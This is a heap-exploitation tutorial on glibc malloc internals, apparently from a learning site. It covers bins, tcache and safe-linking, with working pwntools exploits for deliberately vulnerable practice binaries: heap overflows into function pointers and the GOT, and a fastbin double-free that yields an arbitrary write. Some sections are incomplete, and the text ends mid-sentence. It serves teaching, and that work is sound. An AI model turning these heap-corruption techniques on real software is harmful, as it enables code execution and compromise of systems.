1 of 21

Heap

Still learning :)

Moving onto heap exploitation does not require you to be a god at stack exploitation, but it will require a better understanding of C and how concepts such as pointers work. From time to time we will be discussing the glibc source code itself, and while this can be really overwhelming, it's incredibly good practise.

I'll do everything I can do make it as simple as possible. Most references (to start with) will be hyperlinks, so feel free to just keep the concept in mind for now, but as you progress understanding the source will become more and more important.

Occasionally different snippets of code will be from different glibc versions, and I'll do my best to note down which version they are from. The reason for this is that newer versions have a lot of protections that will obscure the basic logic of the operation, so we will start with older implementations and build up.

Introduction to the Heap

Unlike the stack, heap is an area of memory that can be dynamically allocated. This means that when you need new space, you can "request" more from the heap.

In C, this often means using functions such as malloc() to request the space. However, the heap is very slow and can take up tons of space. This means that the developer has to tell libc when the heap data is "finished with", and it does this via calls to free() which mark the area as available. But where there are humans there will be implementation flaws, and no amount of protection will ever ensure code is completely safe.

In the following sections, we will only discuss 64-bit systems (with the exception of some parts that were written long ago). The theory is the same, but pretty much any heap challenge (or real-world application) will be on 64-bit systems.

Chunks

Internally, every chunk - whether allocated or free - is stored in a structure. The difference is how the memory space is used.

Allocated Chunks

When space is allocated from the heap using a function such as malloc(), a pointer to a heap address is returned. Every chunk has additional metadata that it has to store in both its used and free states.

The chunk has two sections - the metadata of the chunk (information about the chunk) and the user data, where the data is actually stored.

The size field is the overall size of the chunk, including metadata. It must be a multiple of 8, meaning the last 3 bits of the size are 0. This allows the flags A, M and P to take up that space, with M being the 3rd-last bit of size, A the 2nd-last and P the last.

The flags have special uses:

Free Chunks

Free chunks have additional metadata to handle the linking between them.

Freeing Chunks and the Bins

An Overview of Freeing

When we are done with a chunk's data, the data is freed using a function such as free(). This tells glibc that we are done with this portion of memory.

In the interest of being as efficient as possible, glibc makes a lot of effort to recycle previously-used chunks for future requests in the program. As an example, let's say we need 100 bytes to store a string input by the user. Once we are finished with it, we tell glibc we are no longer going to use it. Later in the program, we have to input another 100-byte string from the user. Why not reuse that same part of memory? There's no reason not to, right?

It is the bins that are responsible for the bulk of this memory recycling. A bin is a (doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for different sizes, and the operations will vary depending on the bins as well to keep high performance.

When a chunk is freed, it is "moved" to the bin. This movement is not physical, but rather a pointer - a reference to the chunk - is stored somewhere in the list.

Bin Operations

There are four bins: fastbins, the unsorted bin, smallbins and largebins.

When a chunk is freed, the function that does the bulk of the work in glibc is _int_free(). I won't delve into the source code right now, but will provide hyperlinks to glibc 2.3, a very old one without security checks. You should have a go at familiarising yourself with what the code says, but bear in mind things have been moved about a bit to get to there they are in the present day! You can change the version on the left in bootlin to see how it's changed.

First, the size of the chunk is checked. If it is less than the largest fastbin size, add it to the correct fastbin
Otherwise, if it's mmapped, munmap the chunk
Finally, consolidate them and put them into the unsorted bin

What is consolidation? We'll be looking into this more concretely later, but it's essentially the process of finding other free chunks around the chunk being freed and combining them into one large chunk. This makes the reuse process more efficient.

Fastbins

Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80 or 88 bytes including metadata.

Unsorted Bin

There is only one of these. When small and large chunks are freed, they end of in this bin to speed up allocation and deallocation requests.

Essentially, this bin gives the chunks one last shot at being used. Future malloc requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces and return one of them, speeding up the process - this is the Last Remainder Chunk. If the chunk requested is larger, then the chunks in this bin get moved to the respective Small/Large bins.

Small Bins

There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the same size are stored in the same bins. Small bins are doubly-linked and allocation and deallocation is FIFO.

The purpose of the FD and BK pointers as we saw before are to points to the chunks ahead and behind in the bin.

Before ending up in the unsorted bin, contiguous small chunks (small chunks next to each other in memory) can coalesce (consolidate), meaning their sizes combine and become a bigger chunk.

Large Bins

63 large bins, can store chunks of different sizes. The free chunks are ordered in decreasing order of size, meaning insertions and deletions can occur at any point in the list.

The first 32 bins have a range of 64 bytes:

1st bin: 512 - 568 bytes
2nd bin: 576 - 632 bytes
[...]

Like small chunks, large chunks can coalesce together before ending up in the unsorted bin.

Head and Tail

Each bin is represented by two values, the HEAD and TAIL. As it sounds, HEAD is at the top and TAIL at the bottom. Most insertions happen at the HEAD, so in LIFO structures (such as the fastbins) reallocation occurs there too, whereas in FIFO structures (such as small bins) reallocation occurs at the TAIL. For fastbins, the TAIL is null.

Operations of the Fastbin

Fastbins are a singly-linked list of chunks. The point of these is that very small chunks are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate (they are not absorbed into surrounding free chunks once freed).

A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it is the last chunk).

When a new chunk is freed, it's added at the front of the list (making it the head):

The fd of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of the list

Let's have a visual demonstration (it will help)! Try out the following C program:

#include <stdio.h>
#include <stdlib.h>

int main() {
    char *a = malloc(20);
    char *b = malloc(20);
    char *c = malloc(20);
    
    printf("a: %p\nb: %p\nc: %p\n", a, b, c);

    puts("Freeing...");

    free(a);
    free(b);
    free(c);

    puts("Allocating...");

    char *d = malloc(20);
    char *e = malloc(20);
    char *f = malloc(20);

    printf("d: %p\ne: %p\nf: %p\n", d, e, f);
}

We get:

a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010

As you can see, the chunk a gets reassigned to chunk f, b to e and c to d. So, if we free() a chunk, there's a good chance our next malloc() - if it's of the same size - will use the same chunk.

It can be really confusing as to why we add and remove chunks from the start of the list (why not the end?), but it's really just the most efficient way to add an element. Let's say we have this fastbin setup:

HEAD --> a -> b

In this case HEAD points to a, and a points onwards to b as the next chunk in the bin (because the fd field of a points to b). Now let's say we free another chunk c. If we want to add it to the end of the list like so:

HEAD --> a -> b -> c

We would have to update the fd pointer of b to point at c. But remember that glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has no information about the end of this list, which could be many chunks long. This means that to add c in at the end, it would first have to start at the head and traverse through the entire list until it got to the last chunk, then overwrite the fd field of the last chunk to point at c and make c the last chunk.

Meanwhile, if it adds at the HEAD:

HEAD --> c -> a -> b

All we need to do is:

Set the fd of c to point at a
- This is easy, as a was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c, making it the head of the list
- This is also easy, as the pointer to c is freely available

This has much less overhead!

For reallocating the chunk, the same principle applies - it's much easier to update HEAD to point to a by reading the fd of c than it is to traverse the entire list until it gets to the end.

Operations of the Other Bins

When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are requested, glibc looks at all of the bins

If the requested size is fastbin size, check the corresponding fastbin
- If there is a chunk in it, return it
If the requested chunk is of smallbin size, check the corresponding smallbin
- If there is a chunk in it, return it
If the requested chunk is large (of largebin size), we first consolidate the largebins with malloc_consolidate(). We will get into the mechanisms of this at a later point, but essentially I lied earlier - fastbins do consolidate, but not on freeing!
Finally, we iterate through the chunks in the unsorted bin
- If it is empty, we service the request through making the heap larger by moving the top chunk back and making space
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
If it's larger,

One thing that is very easy to forget is what happens on allocation and what happens on freeing, as it can be a bit counter-intuitive. For example, the fastbin consolidation is triggered from an allocation!

Malloc State

malloc_consolidate()

Consolidating fastbins

, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true, but they don't consolidate automatically; in order for them to consolidate, the function has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.

Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!

If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd and bk will point to a location in malloc_state, which is contained within libc.

This means that the more important thing for us to know is how we can trigger a largebin consolidation.

Some of the most important ways include:

Inputting a very long number into scanf (around 0x400 characters long)
- This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc if it gets even bigger than the heap chunk, and free at the end, so it works to trigger those functions too - great for triggering hooks!).
Inputting something along the lines of %10000c into a format string vulnerability also triggers a chunk to be created

Both of these work because a largebin allocation triggers malloc_consolidate.By checking the calls to the function in (2.35), we can find other triggers.

It's possible for earlier or later glibc versions to have a greater or lesser number of calls to a specific function, so make sure to check for your version! You may find another way exists.

The most common and most important trigger, a call to malloc() requesting a chunk of largebin size will .

There is another call to it in the section . This section is called when the top chunk has to be used to service the request. The checks if the top chunk is large enough to service the request:

So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate().

(If both conditions fail, _int_malloc falls back to esssentially using mmap to service the request).

TODO

Heap Overflow

Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.

To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Protostar.

heap0

http://exploit.education/phoenix/heap-zero/

Source

Luckily it gives us the source:

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct data {
  char name[64];
};

struct fp {
  void (*fp)();
  char __pad[64 - sizeof(unsigned long)];
};

void winner() {
  printf("Congratulations, you have passed this level\n");
}

void nowinner() {
  printf(
      "level has not been passed - function pointer has not been "
      "overwritten\n");
}

int main(int argc, char **argv) {
  struct data *d;
  struct fp *f;

  if (argc < 2) {
    printf("Please specify an argument to copy :-)\n");
    exit(1);
  }

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  strcpy(d->name, argv[1]);

  printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
  fflush(stdout);

  f->fp();

  return 0;
}

Analysis

So let's analyse what it does:

Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
Copies the first command-line argument to the name variable of the chunk d
Runs whatever the fp variable of f points at

The weakness here is clear - it runs a random address on the heap. Our input is copied there after the value is set and there's no bound checking whatsoever, so we can overrun it easily.

Regular Execution

Let's check out the heap in normal conditions.

$ r2 -d -A heap0 AAAAAAAAAAAA            <== that's just a parameter
$ s main; pdf
[...]
0x0040075d      e8fefdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x00400762      488b45f8       mov rax, qword [var_8h]
[...]

We'll break right after the strcpy and see how it looks.

[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762

If we want, we can check the contents.

So, we can see that the function address is there, after our input in memory. Let's work out the offset.

Working out the Offset

Since we want to work out how many characters we need until the pointer, I'll just use a De Bruijn Sequence.

$ ragg2 -P 200 -r

$ r2 -d -A heap0 AAABAACAADAAE...

Let's break on and after the strcpy. That way we can check the location of the pointer then immediately read it and calculate the offset.

[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d

So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.

[0x0040075d]> dc
hit breakpoint at: 0x400762

radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.

Notice we overwrote the size field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060).

[0x00400762]> wopO 0x6441416341416241
80

So, fairly simple - 80 characters, then the address of winner.

Exploit

from pwn import *

elf = context.binary = ELF('./heap0')

payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')

p = elf.process(argv=[payload])

print(p.clean().decode('latin-1'))

We need to remove the null bytes because argv doesn't allow them

heap1

http://exploit.education/phoenix/heap-one/

Source

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

struct heapStructure {
  int priority;
  char *name;
};

int main(int argc, char **argv) {
  struct heapStructure *i1, *i2;

  i1 = malloc(sizeof(struct heapStructure));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct heapStructure));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

void winner() {
  printf(
      "Congratulations, you've completed this level @ %ld seconds past the "
      "Epoch\n",
      time(NULL));
}

Analysis

This program:

Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something

Regular Execution

Let's break on and after the first strcpy.

$ r2 -d -A heap1 AAAA BBBB

As we expected, we have two pairs of heapStructure and name chunks. We know the strcpy will be copying into wherever name points, so let's read the contents of the first heapStructure. Maybe this will give us a clue.

Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.

This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!

And where better to target than the GOT?

Exploitation

The plan, therefore, becomes:

Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner

But what function should we overwrite? The only function called after the strcpy is printf, according to the source code. And if we overwrite printf with winner it'll just recursively call itself forever.

Luckily, compilers like gcc compile printf as puts if there are no parameters - we can see this with radare2:

$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6      e8f5fdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x004006eb      bfa8074000     mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0      e8fbfdffff     call sym.imp.puts

So we can simply overwrite the GOT address of puts with winner. All we need to find now is the padding until the pointer and then we're good to go.

$ ragg2 -P 200 -r
AABAA...

$ r2 -d -A heap1 AAABAA... 0000

Break on and after the strcpy again and analyse the second chunk's name pointer.

The pointer is originally at 0x8d9050; once the strcpy occurs, the value there is 0x41415041414f4141.

[0x004006cd]> wopO 0x41415041414f4141
40

The offset is 40.

Final Exploit

from pwn import *

elf = context.binary = ELF('./heap1', checksec=False)

param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')

p = elf.process(argv=[param1, param2])

print(p.clean().decode('latin-1'))

Again, null bytes aren't allowed in parameters so you have to remove them.

Use-After-Free

Much like the name suggests, this technique involves us using data once it is freed. The weakness here is that programmers often wrongly assume that once the chunk is freed it cannot be used and don't bother writing checks to ensure data is not freed. This means it is possible to write data to a free chunk, which is very dangerous.

TODO: binary

Double-Free

Overview

A double-free can take a bit of time to understand, but ultimately it is very simple.

Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in the bin is specified by the fd pointer. This means if chunk a points to chunk b, once chunk a is freed the next chunk in the bin is chunk b.

In a double-free, we attempt to control fd. By overwriting it with an arbitrary memory address, we can tell malloc() where the next chunk is to be allocated. For example, say we overwrote a->fd to point at 0x12345678; once a is free, the next chunk on the list will be 0x12345678.

Controlling fd

As it sounds, we have to free the chunk twice. But how does that help?

Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:

char *a = malloc(0x20);
free(a);
free(a);

Fairly logical.

But what happens if we called malloc() again for the same size?

char *b = malloc(0x20);

Well, strange things would happen. a is both allocated (in the form of b) and free at the same time.

If you remember, the heap attempts to save as much space as possible and when the chunk is free the fd pointer is written where the user data used to be.

But what does this mean?

When we write into the use data of b, we're writing into the fd of a at the same time.

And remember - controlling fd means we can control where the next chunk gets allocated!

So we can write an address into the data of b, and that's where the next chunk gets placed.

strcpy(b, "\x78\x56\x34\x12");

Now, the next alloc will return a again. This doesn't matter, we want the one afterwards.

malloc(0x20)                     /* This is yet another 'a', we can ignore this */
char *controlled = malloc(0x20); /* This is in the location we want */

Boom - an arbitrary write.

Double-Free Protections

It wouldn't be fun if there were no protections, right?

Using Xenial Xerus, try running:

#include <stdio.h>
#include <stdlib.h>

int main() {
    int *a = malloc(0x50);

    free(a);
    free(a);
    
    return 1;
}

Notice that it throws an error.

Double Free or Corruption (Fasttop)

Is the chunk at the top of the bin the same as the chunk being inserted?

For example, the following code still works:

#include <stdio.h>
#include <stdlib.h>

int main() {
    int *a = malloc(0x50);
    int *b = malloc(0x50);

    free(a);
    free(b);
    free(a);
    
    return 1;
}

malloc(): memory corruption (fast)

When removing the chunk from a fastbin, make sure the size falls into the fastbin's range

The previous protection could be bypassed by freeing another chunk in between the double-free and just doing a bit more work that way, but then you fall into this trap.

Namely, if you overwrite fd with something like 0x08041234, you have to make sure the metadata fits - i.e. the size ahead of the data is completely correct - and that makes it harder, because you can't just write into the GOT, unless you get lucky.

Double-Free Exploit

Still on Xenial Xerus, means both mentioned checks are still relevant. The bypass for the second check (malloc() memory corruption) is given to you in the form of fake metadata already set to a suitable size. Let's check the (relevant parts of) the source.

Analysis

Variables

char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "wrong size" error
char admin[0x10] = "Nuh-huh\0";

// List of users to keep track of
char *users[15];
int userCount = 0;

The fakemetadata variable is the fake size of 0x30, so you can focus on the double-free itself rather than the protection bypass. Directly after this is the admin variable, meaning if you pull the exploit off into the location of that fake metadata, you can just overwrite that as proof.

users is a list of strings for the usernames, and userCount keeps track of the length of the array.

main_loop()

void main_loop() {
    while(1) {
        printf(">> ");

        char input[2];
        read(0, input, sizeof(input));
        int choice = atoi(input);

        switch (choice)
        {
            case 1:
                createUser();
                break;
            case 2:
                deleteUser();
                break;
            case 3:
                complete_level();
            default:
                break;
        }
    }
}

Prompts for input, takes in input. Note that main() itself prints out the location of fakemetadata, so we don't have to mess around with that at all.

createUser()

void createUser() {
    char *name = malloc(0x20);
    users[userCount] = name;

    printf("%s", "Name: ");
    read(0, name, 0x20);

    printf("User Index: %d\nName: %s\nLocation: %p\n", userCount, users[userCount], users[userCount]);
    userCount++;
}

createUser() allocates a chunk of size 0x20 on the heap (real size is 0x30 including metadata, hence the fakemetadata being 0x30) then sets the array entry as a pointer to that chunk. Input then gets written there.

deleteUser()

void deleteUser() {
    printf("Index: ");

    char input[2];
    read(0, input, sizeof(input));
    int choice = atoi(input);


    char *name = users[choice];
    printf("User %d:\n\tName: %s\n", choice, name, name);

    // Check user actually exists before freeing
    if(choice < 0 || choice >= userCount) {
        puts("Invalid Index!");
        return;
    }
    else {
        free(name);
        puts("User freed!");
    }
}

Get index, print out the details and free() it. Easy peasy.

complete_level()

void complete_level() {
    if(strcmp(admin, "admin\n")) {
        puts("Level Complete!");
        return;
    }
}

Checks you overwrote admin with admin, if you did, mission accomplished!

Exploitation

There's literally no checks in place so we have a plethora of options available, but this tutorial is about using a double-free, so we'll use that.

Setup

First let's make a skeleton of a script, along with some helper functions:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()


def create(name='a'):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('Name: ', name)

def delete(idx):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('Index: ', str(idx))

def complete():
    p.sendlineafter('>> ', '3')
    print(p.recvline())

Finding the Double-Free

As we know with the fasttop protection, we can't allocate once then free twice - we'll have to free once inbetween.

create('yes')
create('yes')
delete(0)
delete(1)
delete(0)

Let's check the progression of the fastbin by adding a pause() after every delete(). We'll hook on with radare2 using

r2 -d $(pidof vuln)

delete(0) #1

Due to its size, the chunk will go into Fastbin 2, which we can check the contents of using dmhf 2 (dmhf analyses fastbins, and we can specify number 2).

Looks like the first chunk is located at 0xd58000. Let's keep going.

delete(1)

The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being located at 0xd58030.

delete(0) #2

Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is nice enough to point out there's a double-free.

Writing to the Fastbin Freelist

Now we have a double-free, let's allocate Chunk 0 again and put some random data. Because it's also considered free, the data we write is seen as being in the fd pointer of the chunk. Remember, the heap saves space, so fd when free is located exactly where data is when allocated (probably explained better here).

So let's write to fd, and see what happens to the fastbin. Remove all the pause() instructions.

create(p64(0x08080808))
pause()

Run, debug, and dmhf 2.

The last free() gets reused, and our "fake" fastbin location is in the list. Beautiful.

Let's push it to the top of the list by creating two more irrelevant users. We can also parse the fakemetadata location at the beginning of the exploit chain.

p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8

log.success('Fake Metadata: ' + hex(fake_metadata))

[...]

create('junk1')
create('junk2')
pause()

The reason we have to subtract 8 off fakemetadata is that the only thing we faked in the souce is the size field, but prev_size is at the very front of the chunk metadata. If we point the fastbin freelist at the fakemetadata variable it'll interpret it as prev_size and the 8 bytes afterwards as size, so we shift it all back 8 to align it correctly.

Now we can control where we write, and we know where to write to.

Getting the Arbitrary Write

First, let's replace the location we write to with where we want to:

create(p64(fake_metadata))

Now let's finish it off by creating another user. Since we control the fastbin, this user gets written to the location of our fake metadata, giving us an almost arbitrary write.

create('\x00' * 8 + 'admin\x00')
complete()

The 8 null bytes are padding. If you read the source, you notice the metadata string is 16 bytes long rather than 8, so we need 8 more padding.

$ python3 exploit.py
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'

Awesome - we completed the level!

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()


def create(name='a'):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('Name: ', name)

def delete(idx):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('Index: ', str(idx))

def complete():
    p.sendlineafter('>> ', '3')
    print(p.recvline())

p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8

log.success('Fake Metadata: ' + hex(fake_metadata))

create('yes')
create('yes')
delete(0)
delete(1)
delete(0)

create(p64(fake_metadata))
create('junk1')
create('junk2')

create('\x00' * 8 + 'admin\x00')
complete()

32-bit

Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try it yourself :)

Unlink Exploit

Overview

When a chunk is removed from a bin, unlink() is called on the chunk. The unlink macro looks like this:

Note how fd and bk are written to location depending on fd and bk- if we control both fd and bk, we can get an arbitrary write.

Consider the following example:

We want to write the value 0x1000000c to 0x5655578c. If we had the ability to create a fake free chunk, we could choose the values for fd and bk. In this example, we would set fd to 0x56555780 (bear in mind the first 0x8 bytes in 32-bit would be for the metadata, so P->fd is actually 8 bytes off P and P->bk is 12 bytes off) and bk to 0x10000000. Then when we unlink() this fake chunk, the process is as follows:

This may seem like a lot to take in. It's a lot of seemingly random numbers. What you need to understand is P->fd just means 8 bytes off P and P->bk just means 12 bytes off P.

If you imagine the chunk looking like

Then the fd and bk pointers point at the start of the chunk - prev_size. So when overwriting the fd pointer here:

FD points to 0x56555780, and then 0xc gets added on for bk, making the write actually occur at 0x5655578c, which is what we wanted. That is why we fake fd and bk values lower than the actual intended write location.

In 64-bit, all the chunk data takes up 0x8 bytes each, so the offsets for fd and bk will be 0x10 and 0x18 respectively.

The slight issue with the unlink exploit is not only does fd get written to where you want, bk gets written as well - and if the location you are writing either of these to is protected memory, the binary will crash.

Protections

More modern libc versions have a different version of the unlink macro, which looks like this:

Here unlink() check the bk pointer of the forward chunk and the fd pointer of the backward chunk and makes sure they point to P, which is unlikely if you fake a chunk. This quite significantly restricts where we can write using unlink.

The Tcache

New and efficient heap management

Starting in , a new heap feature called the tcache was released. The tcache was designed to be a performance booster, and the operation is very simple: every chunk size (up to size 0x410) has its own tcache bin, which can store up to 7 chunks. When a chunk of a specific size is allocated, the tcache bin is searched first. When it is freed, the chunk is added to the tcache bin; if it is full, it then goes to the standard fastbin/unsortedbin.

The tcache bin acts like a fastbin - it is a singly-linked list of free chunks of a specific size. The handling of the list, using fd pointers, is identical. As you can expect, the attacks on the tcache are also similar to the attacks on fastbins.

Ironically, years of defenses that were implemented into the fastbins - such as the - were ignored in the initial implementation of the tcache. This means that using the heap to attack a binary running under glibc 2.27 binary is easier than one running under 2.25!

Tcache: calloc()

Tcache Poisoning

Reintroducing double-frees

Tcache poisoning is a fancy name for a double-free in the tcache chunks.

Tcache Keys

A primitive double-free protection

Starting from glibc 2.29, the tcache was hardened by the addition of a second field in the tcache_entry struct, the :

It's a pointer to a tcache_perthread_struct. In the function, we can see what key is set to:

The chunk being freed is variable e. We can see here that before tcache_put() is called on it, there is a check being done:

The check determines whether the key field of the chunk e is set to the address of the tcache_perthread_struct already. Remember that this happens when it is put into the tcache with tcache_put()! If the pointer is already there, there is a very high chance that it's because the chunk has already been freed, in which case it's a double-free!

It's not a 100% guaranteed double-free though - as the comment above it says:

This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting.

There is a 1/2^<size_t> chance that the key being tcache_perthread_struct already is a coincidence. To verify, it simply iterates through the tcache bin and compares the chunks to the one being freed:

Iterates through each entry, calls it tmp and compares it to e. If equal, it detected a double-free.

You can think of the key as an effectively random value (due to ASLR) that gets checked against, and if it's the correct value then something is suspicious.

In fact, the key can even be helpful for us - the fd pointer of the tcache chunk is mangled, so a UAF does not guarantee a heap leak. The key field is not mangled, so if we can leak the location of tcache_perthread_struct instead, this gives us a heap leak as it is always located at heap_base + 0x10.

The value of tcache_key does not really have to be a cryptographically secure random number. It only needs to be arbitrary enough so that it does not collide with values present in applications. [...]

This isn't a huge change - it's still only straight double-frees that are affected. We can no longer leak the heap via the key, however.

Safe Linking

Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd pointer of free chunks in these bins with a mangling operation, making it more difficult to overwrite it with an arbitrary value.

Every single fd pointer is protected by , which is undone by :

Here, pos is the location of the current chunk and ptr the location of the chunk we are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are using ASLR to protect! The >>12 gets rid of the predictable last 12 bits of ASLR, keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are pretty predictable):

So, what does this mean to an attacker?

Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in PROTECT_PTR, and we can easily recreate it to fake our own mangled pointer.

When trying to get a chunk e out of the tcache, alignment is checked.

The macros are defined side-by-side, but really aligned_OK is for addresses while misaligned_chunk is for chunks.

This alignment check means you would have to guess 16 bits of entropy, leading to a 1/16 chance if you attempt to brute-force the last 16 bits to be